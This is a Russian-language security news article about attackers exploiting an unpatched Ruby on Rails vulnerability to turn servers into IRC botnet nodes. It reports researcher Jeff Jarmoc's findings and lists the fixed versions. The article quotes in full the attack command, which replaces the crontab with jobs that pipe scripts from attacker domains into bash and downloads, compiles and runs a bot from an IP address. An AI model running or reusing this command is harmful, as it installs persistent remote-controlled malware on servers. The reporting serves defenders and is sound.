Уязвимость в Ruby on Rails делает серверы частью ботсети

уязвимость сервер патч
Уязвимость в Ruby on Rails делает серверы частью ботсети
уязвимость сервер патч

Брешь позволяет злоумышленникам заставить сервер загрузить и выполнить вредоносный код и присоединиться к новым каналам IRC.

В Ruby on Rails существует уязвимость , которая позволяет злоумышленникам получить доступ к серверу и сделать его частью ботнета. Информация о бреше появилась еще в январе текущего года, и вскоре после этого для нее был выпущен патч. Однако сейчас появились доказательства того, что мошенники активно используют уязвимость. Их жертвами зачастую становятся серверы, чьи администраторы не установили патчи.

Как сообщает в своем личном блоге IT-специалист Джефф Джармос (Jeff Jarmoc), уязвимость позволяет злоумышленникам заставить сервер загрузить и выполнить вредоносный код и присоединиться к новым каналам IRC, которые не требуют аутентификации. Это может позволить злоумышленникам проникнуть в чат и заполучить полный контроль над взломанными серверами.

Джармок не сообщил количество зараженных ботом серверов, однако заявил, что сейчас они отключены.

Проведение атаки становится возможным следующей команде, которая загружает выполняет файлы:

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

На момент написания новости, это уже не доступно. Эти домены ранее были связаны с вирусной активностью. Далее, он загружает исходный файл на C под названием «k.c» в /tmp, компилирует его, используя GCC системы, и выполняет его. Наконец, он загружает и выполняет предварительно скомпилированные версии файла «k», предположительно в случае если компиляция завершится неудачно этот файл выполняется с именем ' – bash', которая будет отображаться в процессах. Программа устанавливает IRC бота, который подключается к cvv4you.ru (в настоящее время 188.190.124.81) или IP 188.190.124.120 и присоединяется к каналу #rails. Ни один ключ не используется, хотя код и поддерживает это. Сценарий использует сформированный случайным образом 9-символьный ник при подключении к IRC. Файл блокировки '/tmp/tan.pid' обеспечивает выполнение кода только один раз на зараженном хосте.

Атаке не подвержены версии Ruby on Rails 3.2.11, 3.1.10, 3.0.19, 2.3.15 или более поздние.

Большой брат следит за вами, но мы знаем, как остановить его

Подпишитесь на наш канал!

Новости по теме

За кулисами кибербезопасности: что скрывают Fortinet, JetBrains и Microsoft?

BatBadBut: ошибка в Rust позволяет захватить компьютер без вашего ведома

Уязвимости Nagios XI могут превратить ваш сервер в часть ботнета

Брешь в YubiKey Manager или как Microsoft Edge спасает пользователей от взлома

CVE-2024-21894: продукты Ivanti вновь тонут в RCE- и DoS-атаках

Ваш Intel в безопасности? Microsoft подсказывает, как защититься от уязвимости Spectre

Обновите Netcat CMS: хакеры могут создавать учетные записи админов

Telegram устранил 0day, используемый для удаленного запуска кода

NIST не справляется с лавиной уязвимостей: Конгресс США как последняя надежда